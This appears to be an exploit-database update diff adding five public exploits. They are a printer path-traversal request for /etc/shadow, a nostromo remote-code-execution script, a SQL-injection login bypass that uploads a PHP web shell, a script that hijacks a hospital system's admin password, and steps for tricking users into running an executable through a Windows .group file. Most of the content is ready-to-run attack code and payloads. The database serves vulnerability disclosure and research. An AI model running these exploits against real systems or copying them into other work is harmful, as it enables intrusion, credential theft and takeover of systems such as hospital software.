DB: 2020-01-02

5 changes to exploits/shellcodes

Microsoft Windows .Group File - Code Execution

nostromo 1.9.6 - Remote Code Execution
Shopping Portal ProVersion 3.0 - Authentication Bypass
IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
Hospital Management System 4.0 - Authentication Bypass

exploits/hardware/webapps/47835.txt

@@ -0,0 +1,34 @@
+# Exploit Title: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
+# Date: 2020-01-01
+# Exploit Author: Raif Berkay Dincel
+# Vendor Homepage: ibm.com
+# Software https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?subtype=ca&infotype=an&appname=iSource&supplier=897&letternum=ENUS107-295
+# Version: 1.11
+# CVE-ID: N/A
+# Tested on: Linux Mint / Windows 10
+# Vulnerabilities Discovered Date : 2019/06/10
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/[Payload]
+
+# Proof of Concepts:
+
+TARGET/./../../../../../../../../../../etc/shadow
+
+# Request:
+
+GET /./../../../../../../../../../../etc/shadow HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/json; charset=UTF-8
+Connection: close
+
+# Response:
+
+root:::XXXXX
+www-data:::XXXXX
+nobody:::XXXXX
+default:::XXXXX

exploits/multiple/remote/47837.py

@@ -0,0 +1,70 @@
+# Exploit Title: nostromo 1.9.6 - Remote Code Execution
+# Date: 2019-12-31
+# Exploit Author: Kr0ff
+# Vendor Homepage:
+# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
+# Version: 1.9.6
+# Tested on: Debian
+# CVE : CVE-2019-16278
+
+cve2019_16278.py
+
+#!/usr/bin/env python
+
+import sys
+import socket
+
+art = """
+
+                                        _____-2019-16278
+        _____  _______    ______   _____\    \   
+   _____\    \_\      |  |      | /    / |    |  
+  /     /|     ||     /  /     /|/    /  /___/|  
+ /     / /____/||\    \  \    |/|    |__ |___|/  
+|     | |____|/ \ \    \ |    | |       \        
+|     |  _____   \|     \|    | |     __/ __     
+|\     \|\    \   |\         /| |\    \  /  \    
+| \_____\|    |   | \_______/ | | \____\/    |   
+| |     /____/|    \ |     | /  | |    |____/|   
+ \|_____|    ||     \|_____|/    \|____|   | |   
+        |____|/                        |___|/    
+
+
+
+"""
+
+help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
+
+def connect(soc):
+    response = ""
+    try:
+        while True:
+            connection = soc.recv(1024)
+            if len(connection) == 0:
+                break
+            response += connection
+    except:
+        pass
+    return response
+
+def cve(target, port, cmd):
+    soc = socket.socket()
+    soc.connect((target, int(port)))
+    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
+    soc.send(payload)
+    receive = connect(soc)
+    print(receive)
+
+if __name__ == "__main__":
+
+    print(art)
+    
+    try:
+        target = sys.argv[1]
+        port = sys.argv[2]
+        cmd = sys.argv[3]
+
+        cve(target, port, cmd)
+   
+    except IndexError:
+        print(help_menu)

exploits/php/webapps/47834.py

@@ -0,0 +1,79 @@
+# Exploit Title: Shopping Portal ProVersion 3.0 - Authentication Bypass
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/shopping-portal-free-download/
+# Version: v4.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+
+# Description:
+# Password and username parameters have sql injection vulnerability on admin panel.
+# username: joke' or '1'='1'# , password: joke' or '1'='1'#
+# Also, there isn't any restriction for malicious file uploading in the "Insert Product" section.
+# This two vulnerabilities occur unauthenticated remote command execution.
+
+#!/usr/bin/python
+
+import requests
+import sys
+import urllib                          
+
+if (len(sys.argv) !=3) or sys.argv[1] == "-h":
+	print "[*] Usage: PoC.py rhost/rpath command"
+	print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig"
+	exit(0) 
+
+rhost = sys.argv[1]
+
+command = sys.argv[2]
+
+
+
+url = "http://"+rhost+"/admin/index.php"
+data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+	#login
+
+	lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	print ("[*] Status code for login: %s"%lg.status_code)
+	if lg.status_code != 200:
+		print ("One bad day! Check web application path!")
+		sys.exit()
+
+	#upload file
+
+	files = {'productimage1': ('command.php', '<?php system($_GET["cmd"]); ?>'), 'productimage2': ('joke.txt', 'joke'), 'productimage3': ('joke.txt', 'joke')}
+	fdata = {"category": "3", "subcategory": "8", "productName": "the killing joke", "productCompany": "blah", "productpricebd": "0", "productprice": "0", "productDescription": "blah<br>", "productShippingcharge": "0", "productAvailability": "In Stock", "productimage1": "command.php", "productimage2": "joke.txt", "productimage3": "joke.txt", "submit": ""}
+	
+	furl = "http://"+rhost+"/admin/insert-product.php"
+	fupload = session.post(url=furl, files=files, data=fdata)
+	print ("[*] Status code for file uploading: %s"%fupload.status_code)
+	
+	if fupload.status_code != 200:
+		print ("One bad day! File didn't upload.")
+		sys.exit()
+	dir = 0
+	dirr = str(dir)
+	
+	#find uploaded file
+
+	while True:
+		el = eurl = session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php")	
+
+		if el.status_code == 200:
+			
+			print "File Found!"
+			print "Put On A Happy Face!\r\n\r\n"
+
+			print ("uploaded file location: http://%s/admin/prductimages/%s/command.php?id=%s"%(rhost,dirr,command))
+			break
+		else:			
+			print "trying to find uploaded file..."
+
+		dir += 1
+		dirr = str(dir)
+
+#exec
+final=session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php?cmd="+command)
+print final.text

exploits/php/webapps/47836.py

@@ -0,0 +1,116 @@
+# Exploit Title: Hospital Management System 4.0 - Authentication Bypass
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+
+# Description:
+# Password and username parameters have sql injection vulnerability on admin panel.
+# username: joke' or '1'='1 , password: joke' or '1'='1
+# Exploit changes password of admin user.
+
+
+
+#!/usr/bin/python
+
+import requests
+import sys
+
+
+if (len(sys.argv) !=2) or sys.argv[1] == "-h":
+print "[*] Usage: PoC.py rhost/rpath"
+print "[*] e.g.: PoC.py 127.0.0.1/hospital"
+exit(0)
+
+rhost = sys.argv[1]
+
+npasswd = str(raw_input("Please enter at least six characters for new password: "))
+
+url = "http://"+rhost+"/hms/admin/index.php"
+data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}
+
+
+#login
+
+with requests.Session() as session:
+lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+
+#check authentication bypass
+
+check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
+print ("[*] Status code: %s"%check.status_code)
+
+if check.status_code == 200:
+print "[+] Authentication bypass was successful!"
+print "[+] Trying to change password."
+elif check.status_code == 404:
+print "[-] One bad day! Check target web application path."
+sys.exit()
+else:
+print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
+sys.exit()
+
+#change password
+
+cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
+cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+if cgpasswd.status_code == 200:
+print ("[+] Username is: admin")
+  print ("[+] New password is: %s"%npasswd)
+        else:
+print "[-] One bad day! Try it manually."
+sys.exit()
+
+hospital_poc.py
+
+#!/usr/bin/python
+
+import requests
+import sys
+
+
+if (len(sys.argv) !=2) or sys.argv[1] == "-h":
+	print "[*] Usage: PoC.py rhost/rpath"
+	print "[*] e.g.: PoC.py 127.0.0.1/hospital"
+	exit(0) 
+
+rhost = sys.argv[1]
+
+npasswd = str(raw_input("Please enter at least six characters for new password: "))
+
+url = "http://"+rhost+"/hms/admin/index.php"
+data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} 
+
+
+#login
+
+with requests.Session() as session:
+	lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	
+	#check authentication bypass
+
+	check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
+	print ("[*] Status code: %s"%check.status_code)
+
+	if check.status_code == 200:
+		print "[+] Authentication bypass was successful!"
+		print "[+] Trying to change password."
+	elif check.status_code == 404:
+		print "[-] One bad day! Check target web application path."
+		sys.exit()
+	else:
+		print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
+		sys.exit()
+	
+	#change password
+
+	cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
+	cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	if cgpasswd.status_code == 200:
+		print ("[+] Username is: admin")
+  		print ("[+] New password is: %s"%npasswd)
+        else:
+		print "[-] One bad day! Try it manually."
+		sys.exit()

exploits/windows/local/47838.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Microsoft Windows .Group File - Code Execution
+# Date: 2020-01-01
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.microsoft.com
+# Version: 1.9.6
+# Tested on: Windows
+# CVE : N/A
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
+[+] twitter.com/hyp3rlinx
+[+] apparitionsec@gmail
+[+] ISR: Apparition Security
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows ".Group" File Type
+
+Gorup files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows.
+It contains a list of contacts saved into a group; which can be used to create a mailing list for sending email
+messages to multiple addresses at once.
+
+
+[Vulnerability Type]
+URL Field Code Execution
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details"
+tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability
+affecting Windows .contact files that remains unfixed as of the time of this writing and has a metasploit module available.
+
+[References]
+http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
+
+Therefore, attacker supplied executables can run unexpected to the user, who thinks they visit a website when click the Website go button.
+Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is
+internet downloaded or copied from network share.
+
+This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain
+if not in the Contacts directory. Advisory released for the sake of completeness and user security awareness.
+
+
+[Exploit/POC]
+1) create a Windows .group file
+
+2) create a directory named "http"
+
+3) create an executable file with a .com ext (change .exe to .com) like www.microsoft.com an place it in the "http" dir alongside .group file.
+
+4) point the website URL to the executable using path traversal like "http.\www.microsoft.com" which is the website address in the .group file.
+
+Note: the directory traversal can also point to other dirs like  ..\Downloads\http.\microsoft.com but downside is the URL looks very sketchy.
+
+5) package it up in an archive .rar etc.
+
+6) send the .group file via email, or download it and lure the user to place the archive in the "c:\User\<victim>\Contacts" directory.
+
+7) open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder
+   if not within that dir already) next click the website address go button.
+
+The attackers executable will run instead of navigating to a website as would be expected by an end user.
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: Same type vuln affecting .contact files disclosed January 16, 2019, status remains unfixed.
+January 1, 2020 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -10859,6 +10859,7 @@ id,file,description,date,author,type,platform,port
 47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
 47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
 47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
+47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17881,6 +17882,7 @@ id,file,description,date,author,type,platform,port
 47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
 47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
 47799,exploits/windows/remote/47799.txt,"FreeSWITCH 1.10.1 - Command Execution",2019-12-20,1F98D,remote,windows,
+47837,exploits/multiple/remote/47837.py,"nostromo 1.9.6 - Remote Code Execution",2020-01-01,Kr0ff,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42138,3 +42140,6 @@ id,file,description,date,author,type,platform,port
 47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
 47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
 47832,exploits/php/webapps/47832.py,"Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass",2019-12-31,"Raphael Karger",webapps,php,
+47834,exploits/php/webapps/47834.py,"Shopping Portal ProVersion 3.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
+47835,exploits/hardware/webapps/47835.txt,"IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal",2020-01-01,"Raif Berkay Dincel",webapps,hardware,
+47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,